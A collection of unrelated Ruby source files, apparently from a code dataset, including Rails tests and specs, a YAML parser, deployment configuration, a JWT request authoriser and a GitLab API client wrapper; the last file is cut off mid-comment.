class MergeSortTest < Minitest::Test
SORT_STRATEGY = MergeSort
include SortStrategyTest
def test_time_complexity_output
best = MergeSort::TIME_COMPLEXITY_BEST
worst = MergeSort::TIME_COMPLEXITY_WORST
average = MergeSort::TIME_COMPLEXITY_AVERAGE
space = MergeSort::SPACE_COMPLEXITY
assert_equal("O(n log(n))", worst)
assert_equal("O(n log(n))", best)
assert_equal("O(n log(n))", average)
assert_equal("O(n)", space)
end
end | 26.9 | 48 | 0.737918 |
28fb1bf561509701cc54c338331fc04d6edce984 | 314 | require 'test_helper'
class ServiceTypeTest < Test::Unit::TestCase
def test_new
membership = ServiceType.new('MEMBERSHIP', "Membership", "Membership for this shop.")
assert_equal "MEMBERSHIP", membership.id
end
def test_indexed
assert_equal 'MEMBERSHIP', ServiceType[:membership].id
end
end
| 22.428571 | 89 | 0.742038 |
e977fc0118f0335a3bea3b00b65de3e78d78957c | 1,976 | # This file is auto-generated from the current state of the database. Instead
# of editing this file, please use the migrations feature of Active Record to
# incrementally modify your database, and then regenerate this schema definition.
#
# Note that this schema.rb definition is the authoritative source for your
# database schema. If you need to create the application database on another
# system, you should be using db:schema:load, not running all the migrations
# from scratch. The latter is a flawed and unsustainable approach (the more migrations
# you'll amass, the slower it'll run and the greater likelihood for issues).
#
# It's strongly recommended that you check this file into your version control system.
ActiveRecord::Schema.define(version: 2018_06_05_041857) do
# These are extensions that must be enabled in order to support this database
enable_extension "plpgsql"
create_table "active_storage_attachments", force: :cascade do |t|
t.string "name", null: false
t.string "record_type", null: false
t.bigint "record_id", null: false
t.bigint "blob_id", null: false
t.datetime "created_at", null: false
t.index ["blob_id"], name: "index_active_storage_attachments_on_blob_id"
t.index ["record_type", "record_id", "name", "blob_id"], name: "index_active_storage_attachments_uniqueness", unique: true
end
create_table "active_storage_blobs", force: :cascade do |t|
t.string "key", null: false
t.string "filename", null: false
t.string "content_type"
t.text "metadata"
t.bigint "byte_size", null: false
t.string "checksum", null: false
t.datetime "created_at", null: false
t.string "service_name"
t.index ["key"], name: "index_active_storage_blobs_on_key", unique: true
end
create_table "active_storage_postgresql_files", force: :cascade do |t|
t.oid "oid"
t.string "key"
t.index ["key"], name: "index_active_storage_postgresql_files_on_key", unique: true
end
end
| 42.042553 | 126 | 0.742409 |
280d88bd05153d011f3c5d9c510fb626cbe84ad3 | 2,722 | # == Schema Information
#
# Table name: tafsirs
#
# id :integer not null, primary key
# group_verse_key_from :string
# group_verse_key_to :string
# group_verses_count :integer
# hizb_number :integer
# juz_number :integer
# language_name :string
# manzil_number :integer
# page_number :integer
# resource_name :string
# rub_el_hizb_number :integer
# ruku_number :integer
# surah_ruku_number :integer
# text :text
# verse_key :string
# verse_number :integer
# created_at :datetime not null
# updated_at :datetime not null
# chapter_id :integer
# end_verse_id :integer
# group_tafsir_id :integer
# language_id :integer
# resource_content_id :integer
# start_verse_id :integer
# verse_id :integer
#
# Indexes
#
# index_tafsirs_on_chapter_id (chapter_id)
# index_tafsirs_on_chapter_id_and_verse_number (chapter_id,verse_number)
# index_tafsirs_on_end_verse_id (end_verse_id)
# index_tafsirs_on_hizb_number (hizb_number)
# index_tafsirs_on_juz_number (juz_number)
# index_tafsirs_on_language_id (language_id)
# index_tafsirs_on_manzil_number (manzil_number)
# index_tafsirs_on_page_number (page_number)
# index_tafsirs_on_resource_content_id (resource_content_id)
# index_tafsirs_on_rub_el_hizb_number (rub_el_hizb_number)
# index_tafsirs_on_ruku_number (ruku_number)
# index_tafsirs_on_start_verse_id (start_verse_id)
# index_tafsirs_on_verse_id (verse_id)
# index_tafsirs_on_verse_key (verse_key)
#
# frozen_string_literal: true
require 'rails_helper'
RSpec.describe Tafsir do
context 'with associations' do
it { is_expected.to belong_to :verse }
it { is_expected.to belong_to :language }
it { is_expected.to belong_to :resource_content }
it { is_expected.to have_many :foot_notes }
end
context 'with columns and indexes' do
columns = {
verse_id: :integer,
language_id: :integer,
text: :text,
language_name: :string,
resource_content_id: :integer,
resource_name: :string,
verse_key: :string
}
indexes = [
['language_id'],
['resource_content_id'],
['verse_id'],
['verse_key']
]
it_behaves_like 'modal with column', columns
it_behaves_like 'modal have indexes on column', indexes
end
end
| 32.404762 | 74 | 0.616458 |
1859721778fd6cd14ea38fac35338e8a727ed0d3 | 8,675 | require 'psych'
require 'delegate'
module Travis::Yaml
module Parser
class Psych
class SetNode < DelegateClass(::Psych::Nodes::Mapping)
def children
super.select.with_index { |_,i| i.even? }
end
end
class ScalarSequence < DelegateClass(::Psych::Nodes::Mapping)
def children
[__getobj__]
end
end
MAP = /\A(?:tag:yaml\.org,2002:|!!?)map\z/
OMAP = /\A(?:tag:yaml\.org,2002:|!!?)omap\z/
PAIRS = /\A(?:tag:yaml\.org,2002:|!!?)pairs\z/
SET = /\A(?:tag:yaml\.org,2002:|!!?)set\z/
SEQ = /\A(?:tag:yaml\.org,2002:|!!?)seq\z/
BINARY = /\A(?:tag:yaml\.org,2002:|!!?)binary\z/
BOOL = /\A(?:tag:yaml\.org,2002:|!!?)bool\z/
FLOAT = /\A(?:tag:yaml\.org,2002:|!!?)float\z/
INT = /\A(?:tag:yaml\.org,2002:|!!?)int\z/
MERGE = /\A(?:tag:yaml\.org,2002:|!!?)merge\z/
NULL = /\A(?:tag:yaml\.org,2002:|!!?)null\z/
STR = /\A(?:tag:yaml\.org,2002:|!!?)str\z/
TIMESTAMP = /\A(?:tag:yaml\.org,2002:|!!?)timestamp\z/
VALUE = /\A(?:tag:yaml\.org,2002:|!!?)value\z/
YAML = /\A(?:tag:yaml\.org,2002:|!!?)yaml\z/
SECURE = /\A!(?:encrypted|secure|decrypted)\z/
TRUE = /\A(?:y|Y|yes|Yes|YES|true|True|TRUE|on|On|ON)\z/
FALSE = /\A(?:n|N|no|No|NO|false|False|FALSE|off|Off|OFF)\z/
REGEXP = /\A!(?:ruby\/)?regexp\z/
REG_FLAGS = { 'i' => Regexp::IGNORECASE, 'm' => Regexp::MULTILINE, 'x' => Regexp::EXTENDED }
FORMATS = {
'!bool' => Regexp.union(TRUE, FALSE),
'!float' => ::Psych::ScalarScanner::FLOAT,
'!null' => /\A(:?~|null|Null|NULL|)\z/,
'!timestamp' => ::Psych::ScalarScanner::TIME,
'!int' => ::Psych::ScalarScanner::INTEGER,
'!regexp' => /\A\/(.*)\/([imx]*)\z/
}
if defined? ::Psych::ClassLoader
CLASS_LOADER = ::Psych::ClassLoader.new
class ScalarScanner < ::Psych::ScalarScanner
def initialize
super(CLASS_LOADER)
end
end
else
ScalarScanner = ::Psych::ScalarScanner
end
def self.parses?(value)
return true if value.is_a?(::Psych::Nodes::Node)
return true if value.is_a?(String) or value.is_a?(IO)
return true if defined?(StringIO) and value.is_a?(StringIO)
value.respond_to?(:to_str) or value.respond_to?(:to_io)
end
def self.parse(value)
new(value).parse
end
def initialize(value)
value = value.to_str if value.respond_to? :to_str
value = value.to_io if value.respond_to? :to_io
@value = value
@scanner = ScalarScanner.new
end
def parse(root = nil)
root ||= Travis::Yaml::Nodes::Root.new
parsed = @value if @value.is_a? ::Psych::Nodes::Node
parsed ||= ::Psych.parse(@value)
accept(root, parsed)
root
rescue ::Psych::SyntaxError => error
root.verify
root.warnings.clear
root.error("syntax error: %s", error.message)
root
end
def accept(node, value)
case value
when ::Psych::Nodes::Scalar then accept_scalar node, value
when ::Psych::Nodes::Mapping then accept_mapping node, value
when ::Psych::Nodes::Sequence then accept_sequence node, value
when ::Psych::Nodes::Alias then accept_alias node, value
when ::Psych::Nodes::Document then accept node, value.root
when ::Psych::Nodes::Stream then accept_sequence node, value
else node.visit_unexpected(self, value) if value
end
node.verify
end
def accept_sequence(node, value)
case value.tag
when SET, SEQ
node.visit_sequence self, value
when nil
value = ScalarSequence.new(value) unless value.is_a? ::Psych::Nodes::Sequence
node.visit_sequence self, value
else
node.visit_sequence self, ScalarSequence.new(value)
end
end
def accept_mapping(node, value)
case value.tag
when MAP, OMAP, PAIRS then node.visit_mapping self, value
when SET then node.visit_sequence self, SetNode.new(value)
when SEQ then node.visit_sequence self, value
when nil
if value.children.size == 2 and value.children.first.value == 'secure'
secret_value = value.children.last
if secret_value.is_a? ::Psych::Nodes::Scalar
secret_value.tag ||= '!secure'
node.visit_scalar(self, :secure, secret_value, false)
else
node.visit_unexpected(self, value, "secret value needs to be a string")
end
else
node.visit_mapping(self, value)
end
else
node.visit_unexpected self, value, "unexpected tag %p for mapping" % value.tag
end
end
def accept_scalar(node, value)
case tag = scalar_tag(value)
when BINARY then node.visit_scalar self, :binary, value, value.tag.nil?
when BOOL then node.visit_scalar self, :bool, value, value.tag.nil?
when FLOAT then node.visit_scalar self, :float, value, value.tag.nil?
when INT then node.visit_scalar self, :int, value, value.tag.nil?
when NULL then node.visit_scalar self, :null, value, value.tag.nil?
when STR then node.visit_scalar self, :str, value, value.tag.nil?
when TIMESTAMP then node.visit_scalar self, :time, value, value.tag.nil?
when SECURE then node.visit_scalar self, :secure, value, value.tag.nil?
when NULL then node.visit_scalar self, :null, value, value.tag.nil?
when REGEXP then node.visit_scalar self, :regexp, value, value.tag.nil?
else node.visit_unexpected self, value, "unexpected tag %p for scalar %p" % [tag, simple(value)]
end
end
def simple(value)
case value
when ::Psych::Nodes::Scalar then value.value
when ::Psych::Nodes::Mapping then simple_mapping(value)
when ::Psych::Nodes::Sequence then value.children.map { |c| simple(c) }
when ::Psych::Nodes::Document then simple(value.root)
when ::Psych::Nodes::Stream then value.children.map { |c| simple(c) }
else value
end
end
def simple_mapping(value)
children = {}
keys, values = value.children.group_by.with_index { |_,i| i.even? }.values_at(true, false)
keys.zip(values) { |key, value| children[simple(key)] = simple(value) } if keys and values
children
end
def scalar_tag(value)
return value.tag if value.tag
return '!str' if value.quoted
FORMATS.each do |tag, format|
return tag if value.value =~ format
end
'!str'
end
def regexp(pattern)
return pattern if pattern.is_a? Regexp
return Regexp.new(pattern) unless pattern =~ FORMATS['!regexp']
flag = $2.chars.inject(0) { |f,c| f | REG_FLAGS.fetch(c, 0) }
Regexp.new($1, flag)
rescue RegexpError => error
raise ArgumentError, "broken regular expression - #{error.message}"
end
def cast(type, value)
case type
when :str then value.value
when :binary then value.value.unpack('m').first
when :bool then value.value !~ FALSE
when :float then Float @scanner.tokenize(value.value)
when :int then Integer @scanner.tokenize(value.value)
when :time then @scanner.parse_time(value.value)
when :secure then SecureString.new(value.value, value.tag != '!decrypted')
when :regexp then regexp(value.value)
when :null then nil
else raise ArgumentError, 'unknown scalar type %p' % type
end
end
def apply_mapping(node, value)
keys, values = value.children.group_by.with_index { |_,i| i.even? }.values_at(true, false)
keys.zip(values) { |key, value| node.visit_pair(self, key, value) } if keys and values
end
def apply_sequence(node, value)
value.children.each { |child| node.visit_child(self, child) }
end
def generate_key(node, value)
if value.respond_to? :value and (value.tag.nil? || value.tag == STR)
value = value.value.to_s
value.start_with?(?:) ? value[1..-1] : value
else
node.visit_unexpected(self, value, "expected string as key")
end
end
end
end
end
| 38.727679 | 104 | 0.575908 |
bb734ffea20de5a60c42ae3c06005fbb2f0d1950 | 628 | Pod::Spec.new do |s|
s.name = "TLTiltSlider"
s.version = "1.0"
s.summary = "A UISlider subclass which adjusts its appearance based on the positional attitude of an iOS device."
s.homepage = "https://github.com/TeehanLax/TLTiltSlider"
s.license = 'MIT'
s.author = { "Ash Furrow" => "[email protected]" }
s.source = { :git => "https://github.com/TeehanLax/TLTiltSlider.git", :tag => "1.0" }
s.platform = :ios, '5.0'
s.source_files = 'TLTiltSlider.h', 'TLTiltSlider.m'
s.resources = "Resources/*.png"
s.frameworks = 'CoreMotion', 'UIKit'
s.requires_arc = true
end
| 41.866667 | 120 | 0.622611 |
6aa6bbc5989d8caf5a2e476a8d9f57facde49e3d | 264 | class Rsvps < ActiveRecord::Migration[6.0]
def change
create_table :rsvps do |t|
t.datetime :created_at
t.integer :user_id, index: true, foreign_key: true
t.integer :event_id, index: true, foreign_key: true
end
end
end
| 24 | 58 | 0.640152 |
f8c55067073b2c082ce2b2bd65fe0d69f00b12fc | 1,598 | require_relative '../spec_helper.rb'
describe 'neo4j::config' do
let(:chef_run) { ChefSpec::SoloRunner.new.converge(described_recipe) }
let(:neo4j_server_properties_template) { chef_run.template('/var/lib/neo4j/conf/neo4j-server.properties') }
let(:neo4j_properties_template) { chef_run.template('/var/lib/neo4j/conf/neo4j.properties') }
let(:neo4j_wrapper_template) { chef_run.template('/var/lib/neo4j/conf/neo4j-wrapper.conf') }
let(:neo4j_logging_properties_template) { chef_run.template('/var/lib/neo4j/conf/logging.properties') }
it 'should create /var/lib/neo4j/conf/neo4j-server.properties' do
expect(chef_run).to create_template('/var/lib/neo4j/conf/neo4j-server.properties')
expect(neo4j_server_properties_template).to notify('service[neo4j]').delayed
end
it 'should create /var/lib/neo4j/conf/neo4j.properties' do
expect(chef_run).to create_template('/var/lib/neo4j/conf/neo4j.properties')
expect(neo4j_server_properties_template).to notify('service[neo4j]').delayed
end
it 'should create /var/lib/neo4j/conf/neo4j-wrapper.conf' do
expect(chef_run).to create_template('/var/lib/neo4j/conf/neo4j-wrapper.conf')
expect(neo4j_server_properties_template).to notify('service[neo4j]').delayed
end
it 'should create /var/lib/neo4j/conf/logging.properties' do
expect(chef_run).to create_template('/var/lib/neo4j/conf/logging.properties')
expect(neo4j_logging_properties_template).to notify('service[neo4j]').delayed
end
it 'includes the neo4j::service recipe' do
expect(chef_run).to include_recipe('neo4j::service')
end
end
| 47 | 109 | 0.765332 |
3800f1e34fab39ae707802b30e18c6c9be36cd81 | 4,830 | # frozen_string_literal: true
# == Schema Information
#
# Table name: pledges
#
# id :integer not null, primary key
# user_id :integer
# created_at :datetime not null
# updated_at :datetime not null
# wishlist_item_id :integer
# quantity :integer default(1), not null
#
require 'rails_helper'
describe Pledge do
# validations
describe 'without an associated wishlist item' do
subject { build(:pledge, wishlist_item: nil) }
it { should_not be_valid }
end
describe 'without an associated user' do
subject { build(:pledge, user: nil) }
it { should be_valid }
end
describe 'without a quantity' do
subject { build(:pledge, quantity: nil) }
it { should_not be_valid }
end
describe 'with a quantity of 0' do
subject { build(:pledge, quantity: 0) }
it { should_not be_valid }
end
describe 'uniqueness validation' do
let(:initial_pledge) { create(:pledge, :with_user) }
context 'when the user and wishlist are duplicated' do
subject do
build(:pledge, user: initial_pledge.user,
wishlist_item: initial_pledge.wishlist_item)
end
it { should_not be_valid }
end
context 'when the user is duplicated but not the wishlist' do
subject { build(:pledge, user: initial_pledge.user) }
it { should be_valid }
end
context 'when the wishlist item is duplicated but not the user' do
subject { build(:pledge, wishlist_item: initial_pledge.wishlist_item) }
it { should be_valid }
end
context 'when the user is nil' do
it 'should allow for "duplicate" pledges' do
wishlist_item = create(:wishlist_item)
create(:pledge, user: nil, wishlist_item: wishlist_item)
anon_pledge = build(:pledge, wishlist_item: wishlist_item)
expect(anon_pledge).to be_valid
end
end
end
describe '#edited?' do
let(:pledge) { create(:pledge) }
context "when it's not been updated" do
subject { pledge.edited? }
it { should be false }
end
context 'when it has been updated' do
before { pledge.update!(quantity: 2) }
subject { pledge.edited? }
it { should be true }
end
end
describe '#anonymous?' do
context "when it's owned by a user" do
subject { create(:pledge, :with_user).anonymous? }
it { should be false }
end
context "when it's not owned by a user" do
subject { create(:pledge, user: nil).anonymous? }
it { should be true }
end
end
describe '#claim_or_increment' do
context 'when another pledge with those attributes exists' do
let(:user) { create(:user) }
let(:existing_pledge) { create(:pledge, user: user) }
let(:pledge) { create(:pledge, user: nil, wishlist_item: existing_pledge.wishlist_item) }
it 'should belong to user' do
pledge.claim_or_increment(user_id: user.id)
expect(pledge.reload.user).to eq user
end
it 'should delete the previous pledge' do
expect do
pledge.claim_or_increment(user_id: user.id)
end.to change(Pledge, :count).by(1)
end
it 'should increment the quantity' do
pledge.claim_or_increment(user_id: user.id)
expect(pledge.reload.quantity).to eq 2
end
end
context "when it's a unique pledge" do
it 'should belong to the user' do
user = create(:user)
pledge = create(:pledge, user: nil)
pledge.claim_or_increment(user_id: user.id)
expect(pledge.reload.user).to eq user
end
end
end
describe '.generate_csv' do
before { create(:pledge, user: create(:user, name: 'Tony Stark')) }
subject(:csv) { Pledge.generate_csv }
it 'should generate a csv' do
expect(csv).to include 'user,'
expect(csv).to include 'Tony Stark'
end
end
describe '.increment_or_new' do
let(:params) do
attributes_for(:pledge).merge(
# attributes_for doesn't include associations
user_id: create(:user).id,
wishlist_item_id: create(:wishlist_item).id
)
end
context "when identical pledge doesn't exist" do
it 'should build a new pledge' do
pledge = Pledge.increment_or_new(params)
expect(pledge).to be_new_record
end
end
context 'when identical pledge does exist' do
before { create(:pledge, params) }
it 'should fetch an existing record' do
pledge = Pledge.increment_or_new(params)
expect(pledge).to be_persisted
end
it 'should increment the existing pledge quantity' do
pledge = Pledge.increment_or_new(params)
expect(pledge).to be_quantity_changed
expect(pledge.quantity).to eq 2
end
end
end
end
| 27.919075 | 95 | 0.637888 |
b9c678e012941a53597eb8bfbc9680b1407c1e7d | 134 | require 'rails_helper'
RSpec.describe PostPostCategory, type: :model do
pending "add some examples to (or delete) #{__FILE__}"
end
| 22.333333 | 56 | 0.761194 |
f8468eebf017eb9e497fc2b47df8c2a938fbca0f | 962 | class AuthorizeApiRequest
def initialize(headers = {})
@headers = headers
end
# Service entry point - return valid user object
def call
{
user: user
}
end
private
attr_reader :headers
def user
# check if user is in the database
# memoize user object
@user ||= User.find(decoded_auth_token[:user_id]) if decoded_auth_token
# handle user not found
rescue ActiveRecord::RecordNotFound => e
# raise custom error
raise(
ExceptionHandler::InvalidToken,
("#{Message.invalid_token} #{e.message}")
)
end
# decode authentication token
def decoded_auth_token
@decoded_auth_token ||= JsonWebToken.decode(http_auth_header)
end
# check for token in `Authorization` header
def http_auth_header
if headers['Authorization'].present?
return headers['Authorization'].split(' ').last
end
raise(ExceptionHandler::MissingToken, Message.missing_token)
end
end | 22.904762 | 75 | 0.686071 |
393733730f88881b31b9c4fc40ce3b4cfbd67551 | 501 | module Kontena::Cli::Vault
class UpdateCommand < Clamp::Command
include Kontena::Cli::Common
parameter 'NAME', 'Secret name'
parameter '[VALUE]', 'Secret value'
def execute
require_api_url
token = require_token
secret = value
if secret.to_s == ''
secret = STDIN.read
end
abort('No value provided') if secret.to_s == ''
data = {value: secret}
client(token).put("grids/#{current_grid}/secrets/#{name}", data)
end
end
end
| 23.857143 | 70 | 0.61477 |
115ca932f3eeca93cdb72962806c2de24f28573a | 131 | ## $:.unshift(File.dirname(__FILE__))
## minitest setup
require 'minitest/autorun'
## our own code
require 'base32-alphabets'
| 11.909091 | 37 | 0.709924 |
e24f97bdd4661c5718f76c0251d53bbf86dad164 | 2,733 | # config valid for current version and patch releases of Capistrano
lock "~> 3.11.0"
set :repo_url, '[email protected]:ali-hassan/decomates.git'
set :application, 'marketplace'
set :user, 'ubuntu'
set :puma_threads, [4, 16]
set :puma_workers, 3
# Don't change these unless you know what you're doing
set :pty, true
# set :use_sudo, false
# set :deploy_via, :remote_cache
set :deploy_to, "/home/#{fetch(:user)}/var/www/#{fetch(:application)}"
set :puma_bind, "unix://#{shared_path}/tmp/sockets/marketplace-puma.sock"
set :puma_state, "#{shared_path}/tmp/pids/puma.state"
set :puma_pid, "#{shared_path}/tmp/pids/puma.pid"
set :puma_access_log, "#{release_path}/log/puma.access.log"
set :puma_error_log, "#{release_path}/log/puma.error.log"
set :whenever_identifier, ->{ "#{fetch(:application)}_#{fetch(:stage)}" }
# set :ssh_options, { forward_agent: true, user: fetch(:user), keys: %w(~/.ssh/id_rsa.pub) }
set :puma_preload_app, true
set :puma_init_active_record, true # Change to false when not using ActiveRecord
set :linked_files, %w{config/database.yml config/secrets.yml config/config.yml}
set :linked_dirs, %w{log tmp/pids tmp/cache tmp/sockets vendor/bundle public/system public/reports}
append :asdf_map_ruby_bins, 'puma', 'pumactl'
namespace :puma do
desc 'Create Directories for Puma Pids and Socket'
task :make_dirs do
on roles(:app) do
execute "mkdir #{shared_path}/tmp/sockets -p"
execute "mkdir #{shared_path}/tmp/pids -p"
end
end
before :start, :make_dirs
end
namespace :deploy do
desc "Make sure local git is in sync with remote."
task :check_revision do
on roles(:app) do
unless `git rev-parse HEAD` == `git rev-parse origin/#{fetch(:branch)}`
puts "WARNING: HEAD is not the same as origin/#{fetch(:branch)}"
puts "Run `git push` to sync changes."
exit
end
end
end
desc 'Initial Deploy'
task :initial do
on roles(:app) do
before 'deploy:restart', 'puma:start'
invoke 'deploy'
end
end
desc 'Upload to shared/config'
task :upload do
on roles (:app) do
upload! "config/database.yml", "#{shared_path}/config/database.yml"
upload! "config/secrets.yml", "#{shared_path}/config/secrets.yml"
end
end
before :starting, :check_revision
before 'check:linked_files', 'puma:config'
after :finishing, :compile_assets
after :finishing, :cleanup
end
desc "Run rake db:seed on a remote server."
task :seed do
on roles (:app) do
within release_path do
with rails_env: fetch(:rails_env) do
execute :rake, "db:seed"
end
end
end
end
# ps aux | grep puma # Get puma pid | 31.056818 | 100 | 0.669594 |
b9ed541254a2047a58210fc86569e55698381df1 | 1,061 | # coding: utf-8
lib = File.expand_path('../lib', __FILE__)
$LOAD_PATH.unshift(lib) unless $LOAD_PATH.include?(lib)
require 'hashie_mash_knockoff/version'
Gem::Specification.new do |spec|
spec.name = 'hashie_mash_knockoff'
spec.version = HashieMashKnockoff::VERSION
spec.authors = ['Michael Pope']
spec.email = ['[email protected]']
spec.summary = %q{A Hashie::Mash knockoff}
spec.description = spec.summary
spec.homepage = 'https://github.com/amorphid/hashie_mash_knockoff'
spec.license = 'MIT'
spec.files = `git ls-files -z`.split("\x0").reject { |f| f.match(%r{^(test|spec|features)/}) }
spec.bindir = 'exe'
spec.executables = spec.files.grep(%r{^exe/}) { |f| File.basename(f) }
spec.require_paths = ['lib']
spec.add_development_dependency 'bundler', '~> 1.10'
spec.add_development_dependency 'rake', '~> 10.0'
spec.add_development_dependency 'rspec', '~> 3.3'
spec.add_runtime_dependency 'json', '~> 1.8'
spec.add_runtime_dependency 'srm', '~> 0.1'
end
| 36.586207 | 104 | 0.653157 |
918f87f9a092b0da845e82b28b2e3e56211ca849 | 613 | # == Schema Information
#
# Table name: containers
#
# content :jsonb
# created_at :datetime not null
# id :integer not null, primary key
# locale :string
# page_id :integer
# row_order :integer
# slug :string
# type :string
# updated_at :datetime not null
#
class Container::Markdown < ::Container
store_accessor :content, :markdown
def custom_container_permitted_attributes
%i(markdown)
end
def renderer(options={})
Redcarpet::Markdown.new(
Redcarpet::Render::HTML,
{ autolink: true, tables: true }
)
end
end
| 20.433333 | 53 | 0.624796 |
1c24ab9927e59bc07c8480d3f8de9fe85247e6fe | 971 | require_relative 'common'
module Kontena::Machine::Aws
class KeypairProvisioner
attr_reader :ec2, :region, :public_key, :keypair_name
# @param [String] access_key_id aws_access_key_id
# @param [String] secret_key aws_secret_access_key
# @param [String] region
def initialize(access_key_id, secret_key, region)
@ec2 = ::Aws::EC2::Resource.new(
region: region, credentials: ::Aws::Credentials.new(access_key_id, secret_key)
)
end
def validate_opts!(opts)
if opts[:public_key]
@public_key = opts[:public_key]
else
raise "Missing public key"
end
@keypair_name = opts[:keypair_name] || "kontena-#{SecureRandom.hex(4)}-#{Time.now.strftime '%Y-%m-%d'}"
end
# @param [Hash] opts
def run!(opts)
validate_opts!(opts)
ec2.import_key_pair(
key_name: keypair_name,
public_key_material: public_key,
dry_run: false
)
end
end
end
| 24.897436 | 109 | 0.644696 |
628421f69d243b8143c81d9e5c4a3564fcfe7921 | 128 | class AddRecipeToComments < ActiveRecord::Migration[6.0]
def change
add_column :comments, :recipe, :text
end
end
| 18.285714 | 56 | 0.703125 |
e28163ae454cb76b623fec58e4400e70367662df | 5,373 | # Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
module Azure::DataFactory::Mgmt::V2018_06_01
module Models
#
# Spark Server dataset.
#
class SparkObjectDataset < Dataset
include MsRestAzure
def initialize
@type = "SparkObject"
end
attr_accessor :type
# @return This property will be retired. Please consider using schema +
# table properties instead.
attr_accessor :table_name
# @return The table name of the Spark. Type: string (or Expression with
# resultType string).
attr_accessor :table
# @return The schema name of the Spark. Type: string (or Expression with
# resultType string).
attr_accessor :spark_object_dataset_schema
#
# Mapper for SparkObjectDataset class as Ruby Hash.
# This will be used for serialization/deserialization.
#
def self.mapper()
{
client_side_validation: true,
required: false,
serialized_name: 'SparkObject',
type: {
name: 'Composite',
class_name: 'SparkObjectDataset',
model_properties: {
additional_properties: {
client_side_validation: true,
required: false,
type: {
name: 'Dictionary',
value: {
client_side_validation: true,
required: false,
serialized_name: 'ObjectElementType',
type: {
name: 'Object'
}
}
}
},
description: {
client_side_validation: true,
required: false,
serialized_name: 'description',
type: {
name: 'String'
}
},
structure: {
client_side_validation: true,
required: false,
serialized_name: 'structure',
type: {
name: 'Object'
}
},
schema: {
client_side_validation: true,
required: false,
serialized_name: 'schema',
type: {
name: 'Object'
}
},
linked_service_name: {
client_side_validation: true,
required: true,
serialized_name: 'linkedServiceName',
default_value: {},
type: {
name: 'Composite',
class_name: 'LinkedServiceReference'
}
},
parameters: {
client_side_validation: true,
required: false,
serialized_name: 'parameters',
type: {
name: 'Dictionary',
value: {
client_side_validation: true,
required: false,
serialized_name: 'ParameterSpecificationElementType',
type: {
name: 'Composite',
class_name: 'ParameterSpecification'
}
}
}
},
annotations: {
client_side_validation: true,
required: false,
serialized_name: 'annotations',
type: {
name: 'Sequence',
element: {
client_side_validation: true,
required: false,
serialized_name: 'ObjectElementType',
type: {
name: 'Object'
}
}
}
},
folder: {
client_side_validation: true,
required: false,
serialized_name: 'folder',
type: {
name: 'Composite',
class_name: 'DatasetFolder'
}
},
type: {
client_side_validation: true,
required: true,
serialized_name: 'type',
type: {
name: 'String'
}
},
table_name: {
client_side_validation: true,
required: false,
serialized_name: 'typeProperties.tableName',
type: {
name: 'Object'
}
},
table: {
client_side_validation: true,
required: false,
serialized_name: 'typeProperties.table',
type: {
name: 'Object'
}
},
spark_object_dataset_schema: {
client_side_validation: true,
required: false,
serialized_name: 'typeProperties.schema',
type: {
name: 'Object'
}
}
}
}
}
end
end
end
end
| 30.355932 | 78 | 0.427136 |
183827cc442271328e5ade3da717e4c938d3166e | 209 | class CreateUserInterests < ActiveRecord::Migration
def change
create_table :user_interests do |t|
t.belongs_to :user
t.belongs_to :interest
t.timestamps null: false
end
end
end
| 19 | 51 | 0.698565 |
d5ea3a233da8fabace4e1b94296c46411c768527 | 2,053 | class AccountYear
attr_accessor :account, :year, :debits, :credits
def initialize(account:, year:, debits: false, credits: false)
@account = account
@year = year
@debits = debits
@credits = credits
end
def collection
@collection ||= (
# All the groups
categories = items.map { |item| item.category }.uniq
monthly = items.group_by { |item| "#{item.category_id}_#{item.date.month}" }
totally = items.group_by { |item| item.category_id }
# For each category, category, months, total
categories.inject({}) do |h, category|
h[category.id] = (
[category] + months.map do |month|
monthly.fetch("#{category.id}_#{month.month}", [])
end + [totally.fetch(category.id, [])]
); h
end
)
end
def totals
@totals ||= (
monthly = items.group_by { |item| Time.zone.local(year, item.date.month) }
['Total'] + months.map { |month| monthly.fetch(month, []) } + [items]
)
end
def balances
@balances ||= (
monthly = items.group_by { |item| Time.zone.local(year, item.date.month) }
['Balance'] + months.map do |month|
last_day_of_month = month.end_of_month.to_date
monthly.fetch(month, []).sort do |a, b|
val = a.date <=> b.date
val == 0 ? a.id <=> b.id : val
end.last
end
)
end
# At end of period
def last_year_item
@last_year_item ||= Item.where(account: account, date: Time.zone.local(year-1).all_year).order(:date, :id).last
end
def months
@months ||= (1..12).map { |month| Time.zone.local(year, month) }
end
def debit
true if @debits
end
def credit
true if @credits
end
private
def items
@items ||= (
items = Item.deep.where(account: account, date: months.first.all_year).to_a
# Items scoped by debits or credits
items = items.select { |item| item.debit.present? } if @debits
items = items.select { |item| item.credit.present? } if @credits
items
)
end
end
| 25.036585 | 115 | 0.590843 |
213f1f16fe9fa61e6aec8b43144780163cd372d1 | 3,419 | require 'gitlab'
# @summary
# This class wraps Gitlab::Client and provides the method implementations
# required by pdksync main to access the Gitlab API for creating merge
# requests, adding labels, and so forth.
class PdkSync::GitlabClient
# @summary
# Creates a new Gitlab::Client and logs in the user based on the
# supplied access token and the Gitlab API endpoint URL
# @param [String] access_token
# The Gitlab private access token, required to access the Gitlab API
# @param [String] gitlab_api_endpoint
# URL to the Gitlab API endpoint against which to work
def initialize(access_token, gitlab_api_endpoint)
@client = Gitlab.client(endpoint: gitlab_api_endpoint, private_token: access_token)
end
# @summary Checks if the supplied project exists on the Git hosting platform
# @param [String] project
# The full repository name, i.e. "namespace/project"
# @return [Boolean] true if the project exists, false otherwise
def repository?(project)
@client.project(project)
true
rescue Gitlab::Error::NotFound
false
end
# @summary
# Creates a new merge request (i.e. pull request) against the Gitlab
# platform
# @param [String] project
# The full project name, i.e. "namespace/project" in which to create
# the merge request
# @param [String] target_branch
# The target branch against which to create the merge request
# @param [String] source_branch
# The source branch from which to create the merge request
# @param [String] title
# The title/name of the merge request to create
# @param [String] message
# The pull request message/body
# @return
# A Gitlab merge request object for the newly created merge request
def create_pull_request(project, target_branch, source_branch, title, message)
mr_options = {
source_branch: source_branch,
target_branch: target_branch,
description: message
}
@client.create_merge_request(project, title, mr_options)
end
# @summary Gets the labels available in the project
# @param [String] project
# The full project name, i.e. "namespace/project", from which to get
# the available labels
# @return [Array] List of available labels in the project
def labels(project)
@client.labels(project)
end
# @summary Updates an existing merge request in the repository
# @note This method is specifically used to set labels for a merge request
# @param [String] project
# The full project name, i.e. "namespace/project" in which to update
# the issue
# @param [Integer] id
# The id number of the merge request to update
# @param [Hash] options
# A hash of options defining the changes to the merge request
